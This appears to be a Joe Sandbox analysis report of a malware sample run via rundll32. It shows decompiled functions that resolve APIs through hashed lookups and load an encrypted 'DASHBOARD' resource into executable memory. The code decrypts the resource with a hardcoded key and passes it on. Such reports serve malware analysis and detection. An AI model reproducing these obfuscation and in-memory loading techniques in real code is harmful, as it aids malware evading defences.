
                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 280 371e22-371ea6 call 3820b9 call 38aa30 RtlAllocateHeap
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E00371E22(long __ecx, void* __edx, long _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				void* _t27;
                                                                                                                      				void* _t34;
                                                                                                                      				signed int _t36;
                                                                                                                      				long _t42;
                                                                                                                      
                                                                                                                      				_push(__ecx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				_push(_a16);
                                                                                                                      				_t42 = __ecx;
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E003820B9(_t27);
                                                                                                                      				_v12 = 0x309d17;
                                                                                                                      				_v12 = _v12 | 0x1b560655;
                                                                                                                      				_v12 = _v12 ^ 0x1b78328a;
                                                                                                                      				_v8 = 0xa187d;
                                                                                                                      				_v8 = _v8 + 0xa972;
                                                                                                                      				_t36 = 0x67;
                                                                                                                      				_v8 = _v8 / _t36;
                                                                                                                      				_v8 = _v8 << 7;
                                                                                                                      				_v8 = _v8 ^ 0x000b519a;
                                                                                                                      				E0038AA30(0x1c2, 0x9df7cc0d, _t36, 0x8eab3015);
                                                                                                                      				_t34 = RtlAllocateHeap(_a8, _t42, _a4); // executed
                                                                                                                      				return _t34;
                                                                                                                      			}









                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(AF136809,000C892D,1B78328A,?,?,?,003780DB,?,00000000,AF136809), ref: 00371EA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                      • Instruction ID: b6be7ddf827da8a450fb84b786cca6038db036a2a8913b930a5e4fac4bfa0276
                                                                                                                      • Opcode Fuzzy Hash: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                      • Instruction Fuzzy Hash: 60010476901208FBEB05DFD4DD4A8DE7BB5EB45354F208099F9086A211E7B29F20AB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 285 3846bb-38473b call 3820b9 call 38aa30 SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E003846BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				void* _t21;
                                                                                                                      				intOrPtr* _t25;
                                                                                                                      				void* _t26;
                                                                                                                      
                                                                                                                      				E003820B9(_t21);
                                                                                                                      				_v20 = 0x3f5bb0;
                                                                                                                      				_v16 = 0;
                                                                                                                      				_v12 = 0x996874;
                                                                                                                      				_v12 = _v12 << 0xf;
                                                                                                                      				_v12 = _v12 ^ 0xb43bad9d;
                                                                                                                      				_v8 = 0xebf0af;
                                                                                                                      				_v8 = _v8 ^ 0x3b7dcb24;
                                                                                                                      				_v8 = _v8 ^ 0x3b96d1fd;
                                                                                                                      				_t25 = E0038AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
                                                                                                                      				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
                                                                                                                      				return _t26;
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00384735
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1514166925-0
                                                                                                                      • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                      • Instruction ID: 09782a1b4ea3e555b4518fdc90f4ed0ac16dda0e58b05b4e3be04706e9bb403c
                                                                                                                      • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                      • Instruction Fuzzy Hash: AF01EC75801218BBCF15AFD5DC498DFBFB8EF45394F108185F91866211D2758A60DBD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 73%
                                                                                                                      			E003793ED() {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				void* _v24;
                                                                                                                      				intOrPtr _v28;
                                                                                                                      				intOrPtr _t24;
                                                                                                                      
                                                                                                                      				_v28 = 0xda6c64;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_v12 = 0x88a564;
                                                                                                                      				_v12 = _v12 | 0x9bf5ed5c;
                                                                                                                      				_v12 = _v12 ^ 0x9bf17c37;
                                                                                                                      				_v8 = 0xd9241f;
                                                                                                                      				_v8 = _v8 * 0x5c;
                                                                                                                      				_v8 = _v8 + 0xccdd;
                                                                                                                      				_v8 = _v8 + 0x903;
                                                                                                                      				_v8 = _v8 ^ 0x4e0c4bb2;
                                                                                                                      				E0038AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
                                                                                                                      				ExitProcess(0);
                                                                                                                      			}








                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 0037945B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                      • Instruction ID: 60a4d0680975cbf6830732f16911f82c1889d872f7ced8ab84c472361a29988a
                                                                                                                      • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                      • Instruction Fuzzy Hash: CEF03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9DA04B7261E7745F459B91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 55%
                                                                                                                      			E00388F9E(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				void* _t19;
                                                                                                                      				int _t24;
                                                                                                                      
                                                                                                                      				_push(__ecx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E003820B9(_t19);
                                                                                                                      				_v12 = 0xd87912;
                                                                                                                      				_v12 = _v12 >> 7;
                                                                                                                      				_v12 = _v12 ^ 0x0006adfb;
                                                                                                                      				_v8 = 0xf5ad8e;
                                                                                                                      				_v8 = _v8 + 0xc481;
                                                                                                                      				_v8 = _v8 >> 4;
                                                                                                                      				_v8 = _v8 ^ 0x00032ff7;
                                                                                                                      				E0038AA30(0x26e, 0x20a9b263, __ecx, 0x37d4b579);
                                                                                                                      				_t24 = CloseServiceHandle(_a12); // executed
                                                                                                                      				return _t24;
                                                                                                                      			}








                                                                                                                      APIs
                                                                                                                      • CloseServiceHandle.ADVAPI32(33E0711C), ref: 00389002
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleService
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1725840886-0
                                                                                                                      • Opcode ID: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                      • Instruction ID: 91a8512992be115e742bfc980f6b6b1a51d04d6aae2e4160e8445efda78c8be0
                                                                                                                      • Opcode Fuzzy Hash: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                      • Instruction Fuzzy Hash: 91F049B191020CFFDF06AFD4C94A89EBBB4EB10308F208198F80566611D6769B64EF51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 68%
                                                                                                                      			E00381F8A(intOrPtr __ecx, void* __edx, WCHAR* _a4) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				void* _t19;
                                                                                                                      				int _t25;
                                                                                                                      
                                                                                                                      				_push(__ecx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E003820B9(_t19);
                                                                                                                      				_v12 = 0x96b134;
                                                                                                                      				_v12 = _v12 + 0xdeb4;
                                                                                                                      				_v12 = _v12 | 0x0c5d8169;
                                                                                                                      				_v12 = _v12 ^ 0x0cdc4dba;
                                                                                                                      				_v8 = 0xf8ae2a;
                                                                                                                      				_v8 = _v8 + 0xcab3;
                                                                                                                      				_v8 = _v8 * 0x2b;
                                                                                                                      				_v8 = _v8 ^ 0x29e0cf29;
                                                                                                                      				E0038AA30(0x112, 0x9df7cc0d, __ecx, 0x6fe24f6c);
                                                                                                                      				_t25 = DeleteFileW(_a4); // executed
                                                                                                                      				return _t25;
                                                                                                                      			}








                                                                                                                      APIs
                                                                                                                      • DeleteFileW.KERNEL32(0CDC4DBA,?,?,?,?), ref: 00381FF5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4033686569-0
                                                                                                                      • Opcode ID: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                      • Instruction ID: c650afb2f802a11bdb76b0f47907f5372ec508b12910bfda7ae09b34d41f6f53
                                                                                                                      • Opcode Fuzzy Hash: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                      • Instruction Fuzzy Hash: 8EF0F9B190120CFBEF18EFD4D9468AEBFB5EB50304F20819AF40467222E7715F549B91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 76%
                                                                                                                      			E00385BFD(intOrPtr __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				void* _t20;
                                                                                                                      				struct HINSTANCE__* _t25;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E003820B9(_t20);
                                                                                                                      				_v16 = _v16 & 0x00000000;
                                                                                                                      				_v24 = 0x5faaf9;
                                                                                                                      				_v20 = 0xab22cd;
                                                                                                                      				_v12 = 0x8e3542;
                                                                                                                      				_v12 = _v12 >> 7;
                                                                                                                      				_v12 = _v12 ^ 0x00089943;
                                                                                                                      				_v8 = 0x9b967a;
                                                                                                                      				_v8 = _v8 ^ 0x4689732a;
                                                                                                                      				_v8 = _v8 ^ 0x4619bdd7;
                                                                                                                      				E0038AA30(0x12d, 0x9df7cc0d, __ecx, 0xf5e9dd1e);
                                                                                                                      				_t25 = LoadLibraryW(_a8); // executed
                                                                                                                      				return _t25;
                                                                                                                      			}











                                                                                                                      APIs
                                                                                                                      • LoadLibraryW.KERNEL32(00000000), ref: 00385C6D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1029625771-0
                                                                                                                      • Opcode ID: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                      • Instruction ID: 882e3058d24d91c190da8d708d6e3ff7a7826cb75016cae2eca5712e9998a69d
                                                                                                                      • Opcode Fuzzy Hash: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                      • Instruction Fuzzy Hash: 50F0FFB5C0020CFBCF05EFE4DA46AEEBBB4FB40318F108188E91566212D3B54B58DB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E0037B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				void* _t27;
                                                                                                                      				int _t32;
                                                                                                                      
                                                                                                                      				_push(__ecx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E003820B9(_t27);
                                                                                                                      				_v12 = 0x6268;
                                                                                                                      				_v12 = _v12 ^ 0x57e834c3;
                                                                                                                      				_v12 = _v12 + 0xffff2919;
                                                                                                                      				_v12 = _v12 + 0xffff3e3d;
                                                                                                                      				_v12 = _v12 ^ 0x57e9dc2b;
                                                                                                                      				_v8 = 0xa46433;
                                                                                                                      				_v8 = _v8 + 0x98ba;
                                                                                                                      				_v8 = _v8 | 0xc390ebe9;
                                                                                                                      				_v8 = _v8 + 0xd5b0;
                                                                                                                      				_v8 = _v8 ^ 0xc3bab866;
                                                                                                                      				E0038AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
                                                                                                                      				_t32 = lstrcmpiW(_a16, _a4); // executed
                                                                                                                      				return _t32;
                                                                                                                      			}








                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNEL32(EE1E6DE5,57E9DC2B), ref: 0037B2C1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                      • Instruction ID: 990d1e94676dfe5714b5f3eca96472de2481dd2d6cd9bb128b4d258173c82d31
                                                                                                                      • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                      • Instruction Fuzzy Hash: DC011AB2C04708FFDF45DFD4DD468AEBB75EB44304F108189B90566152E3754B609B51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 72%
                                                                                                                      			E00381E67(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				void* _t23;
                                                                                                                      				int _t29;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E003820B9(_t23);
                                                                                                                      				_v16 = _v16 & 0x00000000;
                                                                                                                      				_v24 = 0x62b4e9;
                                                                                                                      				_v20 = 0xc383c4;
                                                                                                                      				_v12 = 0x238243;
                                                                                                                      				_v12 = _v12 * 0x67;
                                                                                                                      				_v12 = _v12 ^ 0x0e4d658b;
                                                                                                                      				_v8 = 0x6564d0;
                                                                                                                      				_v8 = _v8 ^ 0x2b193590;
                                                                                                                      				_v8 = _v8 << 0xd;
                                                                                                                      				_v8 = _v8 ^ 0x8a2acb03;
                                                                                                                      				E0038AA30(0x23f, 0x9df7cc0d, __ecx, 0x3185251c);
                                                                                                                      				_t29 = CloseHandle(_a12); // executed
                                                                                                                      				return _t29;
                                                                                                                      			}











                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNEL32(00C383C4), ref: 00381EE1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2962429428-0
                                                                                                                      • Opcode ID: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                      • Instruction ID: 21b655460f63d0f9eb26e416a72bd96848b0849aad2e13ef303cb57284890a36
                                                                                                                      • Opcode Fuzzy Hash: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                      • Instruction Fuzzy Hash: 490128B5C00208FBCF40EFE4D94A99EBFB5EB44308F108499E81567212D7758B14DF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:16.1%
                                                                                                                      Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:297
                                                                                                                      Total number of Limit Nodes:23

                                                                                                                      Control-flow Graph

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E100125C0(void* __ebx, void* __edi, void* __esi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				void* _v8;
                                                                                                                      				void* _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				short _v22;
                                                                                                                      				short _v24;
                                                                                                                      				short _v26;
                                                                                                                      				short _v28;
                                                                                                                      				short _v30;
                                                                                                                      				short _v32;
                                                                                                                      				short _v34;
                                                                                                                      				short _v36;
                                                                                                                      				short _v38;
                                                                                                                      				char _v40;
                                                                                                                      				void* _v44;
                                                                                                                      				void* _v48;
                                                                                                                      				long _v52;
                                                                                                                      				void* _v56;
                                                                                                                      				struct HRSRC__* _v60;
                                                                                                                      				short _v64;
                                                                                                                      				short _v66;
                                                                                                                      				short _v68;
                                                                                                                      				short _v70;
                                                                                                                      				short _v72;
                                                                                                                      				short _v74;
                                                                                                                      				short _v76;
                                                                                                                      				short _v78;
                                                                                                                      				short _v80;
                                                                                                                      				short _v82;
                                                                                                                      				short _v84;
                                                                                                                      				short _v86;
                                                                                                                      				char _v88;
                                                                                                                      				intOrPtr _v92;
                                                                                                                      				void* __ebp;
                                                                                                                      				signed int _t66;
                                                                                                                      				void* _t70;
                                                                                                                      				void* _t72;
                                                                                                                      				struct HRSRC__* _t74;
                                                                                                                      				void* _t78;
                                                                                                                      				intOrPtr _t92;
                                                                                                                      				void* _t93;
                                                                                                                      				void* _t95;
                                                                                                                      				intOrPtr _t104;
                                                                                                                      				signed int _t120;
                                                                                                                      				void* _t121;
                                                                                                                      
                                                                                                                      				_t119 = __esi;
                                                                                                                      				_t118 = __edi;
                                                                                                                      				_t96 = __ebx;
                                                                                                                      				_t66 =  *0x100545cc; // 0xb3edc9c6
                                                                                                                      				_v20 = _t66 ^ _t120;
                                                                                                                      				_v92 = _a8;
                                                                                                                      				 *0x10055a80 = _a4;
                                                                                                                      				_t109 = _a8;
                                                                                                                      				 *0x10055a84 = _a8;
                                                                                                                      				 *0x10055a88 = _a12;
                                                                                                                      				_v8 = 0;
                                                                                                                      				_v52 = 0;
                                                                                                                      				_v44 = 0;
                                                                                                                      				_v48 = 0;
                                                                                                                      				_v12 = 0;
                                                                                                                      				_t70 = E10006A90(__eflags); // executed
                                                                                                                      				_t131 = _t70;
                                                                                                                      				if(_t70 != 0) {
                                                                                                                      					_push(0x10046758);
                                                                                                                      					E1002FE65(__ebx, _t109, __edi, __esi, __eflags);
                                                                                                                      					_t72 = 0;
                                                                                                                      				} else {
                                                                                                                      					 *0x100530b8 = 0;
                                                                                                                      					 *0x100530bc = 0;
                                                                                                                      					 *0x100530c0 = 0;
                                                                                                                      					 *0x100530c8 = 0;
                                                                                                                      					 *0x100530c4 = 0;
                                                                                                                      					 *0x100530cc = 0;
                                                                                                                      					_v60 = 0;
                                                                                                                      					_v56 = 0;
                                                                                                                      					_t74 = FindResourceW(_a4, 0x1705, L"DASHBOARD"); // executed
                                                                                                                      					_v60 = _t74;
                                                                                                                      					_v56 = LoadResource(_a4, _v60);
                                                                                                                      					_v52 = SizeofResource(_a4, _v60);
                                                                                                                      					_v88 = 0x6b;
                                                                                                                      					_v86 = 0x65;
                                                                                                                      					_v84 = 0x72;
                                                                                                                      					_v82 = 0x6e;
                                                                                                                      					_v80 = 0x65;
                                                                                                                      					_v78 = 0x6c;
                                                                                                                      					_v76 = 0x33;
                                                                                                                      					_v74 = 0x32;
                                                                                                                      					_v72 = 0x2e;
                                                                                                                      					_v70 = 0x64;
                                                                                                                      					_v68 = 0x6c;
                                                                                                                      					_v66 = 0x6c;
                                                                                                                      					_v64 = 0;
                                                                                                                      					_v40 = 0x6e;
                                                                                                                      					_v38 = 0x74;
                                                                                                                      					_v36 = 0x64;
                                                                                                                      					_v34 = 0x6c;
                                                                                                                      					_v32 = 0x6c;
                                                                                                                      					_v30 = 0x2e;
                                                                                                                      					_v28 = 0x64;
                                                                                                                      					_v26 = 0x6c;
                                                                                                                      					_v24 = 0x6c;
                                                                                                                      					_v22 = 0;
                                                                                                                      					_t78 = E10006A90(_t131); // executed
                                                                                                                      					if(_t78 == 0) {
                                                                                                                      						_t45 =  &_v88; // 0x6b
                                                                                                                      						_t95 = E100048E0(_t45);
                                                                                                                      						_t121 = _t121 + 4;
                                                                                                                      						_v44 = _t95;
                                                                                                                      					}
                                                                                                                      					_t47 =  &_v40; // 0x6e
                                                                                                                      					_v48 = E100048E0(_t47);
                                                                                                                      					 *0x10055a7c = E100053D0(_v44, 0x6c705b40);
                                                                                                                      					 *0x10055a78 = E100053D0(_v44, 0x531ff383);
                                                                                                                      					_t133 =  *0x10055a78;
                                                                                                                      					if( *0x10055a78 == 0) {
                                                                                                                      						__eflags = 0x2000;
                                                                                                                      						_v12 = VirtualAlloc(0, _v52, 0x00002000 -  *0x100530cc | 0x00001000, 0x40);
                                                                                                                      					} else {
                                                                                                                      						_t93 =  *0x10055a78(0xffffffff, 0, _v52, 0x3000, 0x40, 0); // executed
                                                                                                                      						_v12 = _t93;
                                                                                                                      					}
                                                                                                                      					E1002FB00(_t96, _t118, _t119, _v12, _v56, _v52);
                                                                                                                      					_t104 =  *0x100530b4; // 0x2795
                                                                                                                      					_v16 = E1002F9A6(_t96, _v56, _t118, _t119, _t104);
                                                                                                                      					E10002970(_t133, _v16, "6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0", 0x24);
                                                                                                                      					_t109 = _v16;
                                                                                                                      					E10003EE0(_v16, _v12, _v52);
                                                                                                                      					_t92 = E100026A0(0x10055a64, _v12, _v52); // executed
                                                                                                                      					 *0x10055a8c = _t92;
                                                                                                                      					_t72 = 1;
                                                                                                                      				}
                                                                                                                      				return E1002F81E(_t72, _t96, _v20 ^ _t120, _t109, _t118, _t119);
                                                                                                                      			}

















































                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                      • _printf.LIBCMT ref: 1001265F
                                                                                                                      • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                      • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                      • _malloc.LIBCMT ref: 100127F5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563838910.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563924803.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563954086.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563968854.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563980975.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                      • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                      • API String ID: 572389289-2839844625
                                                                                                                      • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                      • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
